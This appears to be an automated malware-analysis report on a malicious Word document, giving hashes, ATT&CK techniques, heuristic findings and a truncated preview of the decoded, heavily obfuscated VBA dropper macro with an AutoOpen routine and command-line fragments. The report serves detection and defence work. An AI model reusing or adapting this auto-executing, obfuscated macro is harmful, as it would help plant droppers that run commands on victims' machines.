Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 73d69d9e780db52b…

MALICIOUS

Office (OLE)

114.9 KB Created: 2018-09-26 07:23:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 12ff900aabd2150fcf2e572f072603d3 SHA-1: a93c26c4e212cc1cb115dd97ff5a78d6244fc169 SHA-256: 73d69d9e780db52b9f9725390ab0c60c89d23ba301cb03e26cd9a20f749f0487
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro. The macro includes a Shell() call, which is a critical finding, indicating an attempt to execute arbitrary commands. The presence of the 'AutoOpen' macro and the ClamAV detection name 'Doc.Dropper.Agent-6911940-0' strongly suggest this document is designed to drop and execute a secondary payload. No specific family could be identified, but the technique is consistent with a macro-based downloader.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6911940-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6911940-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 64790 bytes
SHA-256: f99e35019bdccc06c491f33d774415609ca1b73e4380b5fe8589f0a21793720c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ochBFSTcDoJZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim zHXiM(1)
zHXiM(0) = Right(dzoFMjA + dHdpwvYkpjRRunUAja + nkDBcvra, 884) + Mid(QFOqWDd + XhRLFVAYzNwGLquCdtPpEp + qzwzDb, 462, 472)
   Dim kXrjbB(2)
kXrjbB(0) = MidB(GmLfqVI + oAQJvMVUwCGMZRGXK + PktIwu, 324, 673) + Right(ETAbb + piNHDWiuDFZOlWpWQmkRElE + tujww, 348) + MidB(HKLNOOF + JfaidqvECFMIfdAzWHcw + iLYSBXfa, 876, 533) + Right(TPQqDr + UwoNilOUDjiWRRdDiZlP + OJkjjE, 713)
kXrjbB(1) = Mid(VjXLjPJ + puqtbwYZolCtoTbdan + CvWMuFtn, 399, 45) + Right(ziUiQi + wuYnzdXnjzSqzFIESjAQA + uGwtN, 852)
   Dim WjdqAw(1)
WjdqAw(0) = MidB(DPbFJ + bWMaXGHaMzviNjLfPA + hFuSC, 329, 364) + Right(WpwtSS + PZCdBlEpBufEZMfVd + qHzkY, 776)
   Dim AdwIRE(1)
AdwIRE(0) = MidB(uCvjNCc + RPIHSUzIWCiXGQwLuSuAifnb + ikUwWY, 249, 790) + MidB(IAzWinH + ihBNnUjXZbitZthjAiDJb + tTYSvXQ, 611, 872)
   Dim mOlZn(2)
mOlZn(0) = MidB(ZCBvuVkE + bhqhHYNpJbHXvVXpB + jfYcu, 66, 21) + Left(VhXaFIq + TLzMYSitzzNPmFRzfiOMB + ZzjBn, 610) + MidB(hzMXHGzA + oYFvSHzjzKwoStfNoM + PFFFaD, 59, 668) + MidB(LMwzi + upwtpcPioMRoVDqpM + tdQjEnj, 810, 353)
mOlZn(1) = Left(puWUbacE + OqQrbWquoUUNwIYNfsWz + iSAcQMIO, 785) + Mid(zpcRtvIa + hZzwREJzstztwEtbLFYS + TvvmzNW, 810, 548)
   Dim QWZjh(1)
QWZjh(0) = Left(wkIDQztL + wiwSoLwKMKsbHvKkNSq + ouwurMN, 554) + Left(vjkwb + hXSlFHbIDivHAMit + Hzzhja, 98) + MidB(ziZCkT + jloSiJiBGnjYShwqSEZiCil + CPKon, 285, 900) + Left(BYnUjmU + whAcMsttJDwFiwivz + XZVoC, 742)
WhFmibfSkzrCz (KeyString(vHuSLuzf + XlbIaVFI + 17 + 14 + 36 + VbHKb + JUinl) + zviaD + JUTSM + KeyString(cFSQMFVT + qvrpKaH + 19 + 16 + 42 + YJfniEzH + orPuO) + KlVXQ + AbGUBWd + swhtwGVXiPC + wpbRj + HnfbAzb + NAZAbAjj + NNPYS)
   Dim ivFzd(1)
ivFzd(0) = MidB(NIazC + fWGmGarSqzZzifUGXDXZ + oYjISH, 332, 27) + Right(RLwzw + dOBEVfUaivzRHzXXoizif + SaWhUJ, 539)
   Dim lXjnzh(1)
lXjnzh(0) = Left(judQd + UGhtEfdYwSTuqajhDkoHQTa + FCPZMQtI, 828) + Right(LHwApfN + JKzQvtjzQadSiisHdw + HTWvmnRk, 111)
End Sub


Attribute VB_Name = "KhKTsOhXdVDIzU"
Function KlVXQ()
iOozbbjQa = "d \/  /\/\/   \/\ /" + "V:ON/C" + """" + "set" + " `\];=20a7 02a7 70a2"
Dim bbPrK(2)
bbPrK(0) = Mid(WYKOwzIT + iQmuwzQrNupRLprIomaH + zQDmv, 939, 192) + Mid(DXvQddWa + AhHzYjRLilDIXhpiwQ + UHSDwOi, 350, 239)
bbPrK(1) = MidB(PZqRioLf + KzOYdcjvXvPznrmChQZwMH + PKqkk, 735, 156) + MidB(DiTmh + jBzZDZuYcRIlQQRjV + KdrdjDP, 374, 325) + MidB(INLInHq + MHVzYFBNUAPLwiZpUiE + dcpqId, 183, 810) + Right(aDHsE + BQwzPQVlFiBSREVwPLEaL + CVnPpVL, 358)
   Dim PROiYU(2)
PROiYU(0) = Left(boPrTH + HOqwqkiuviWPMqSfnGRrqh + VRKCfLS, 274) + Right(jwibjkd + IPwPDbQQpXoBURjs + zwtXH, 389) + Left(ahNEj + WBGBDvYYcRKPAkjq + EswjaE, 800) + Left(vjujz + rzPvZVvKXELhcUpRJKVd + QOhiP, 947)
PROiYU(1) = Right(XtkbPrjw + DAiahaLcjGTWVZHOHuZ + KjkOU, 231) + Right(DwZph + GoEUdtEOBfjcidFSQzqf + zuPXwj, 28)
   Dim UtWQs(2)
UtWQs(0) = Right(nSTSNjBZ + PtCaqkVwDLszVoNJVn + ZCiYum, 832) + Left(BvDCL + dWqlZivVwrunPYjtXHLYjFw + CcTKvQjz, 934)
UtWQs(1) = Right(rHNlwuwQ + OKiiVpRHfaaESLdXiZjIamQ + aoIiTOn, 350) + MidB(abOApFW + uaUMzFCiBEwEuTWsGpf + GYwUYuDD, 413, 256) + MidB(FbLpO + QkfVjcViiKNjGYwkij + arvrS, 840, 222) + MidB(iWbDbDPw + VZLzkSUmsdhYEiljJiW + isFdfV, 640, 770)
zjArrbkHkD = " 720a 2a07" + " 7a20 20a7 270a" + " 70a2 72a0 a072 a"
Dim sacGaP(2)
sacGaP(0) = Left(SKzRtzAW + LFhouZumBcIjdvWUZVN + nMQmCzAv, 690) + Left(GPDfCMZ + LKiRfPDinQzmhJHwmAjY + jOsrRNvj, 546) + Left(iwHnvWu + oThCztEqpimsVwmjZUO + XAKAKrim, 523) + MidB(NhptY + snJrpdnkjKWImizjEQ + sLlMk, 357, 412)
sacGaP(1) = MidB(RAVXl + jqWGvEwiFuLwDtcQf + YUOqzF, 173, 98) + MidB(wmCNt + QGmifXwWMwbAGQRCr + wpdTsMJ, 726, 819) + Left(MAZRl + EtcsMdqhjmvrBKoHLiznk + bhUboiY, 98) + MidB(zGczd + cwuSzCRUkhSrWaCI + sIXmNz, 771, 35)
   Dim iThKl(2)
iThKl(0) = Mid(bfHKTt + jFIjCzUtkqXflCYiwzZv + HadFLZOj, 996, 648) + Right(RSEOVoa + nqdjuLrnGJCXrs
... (truncated)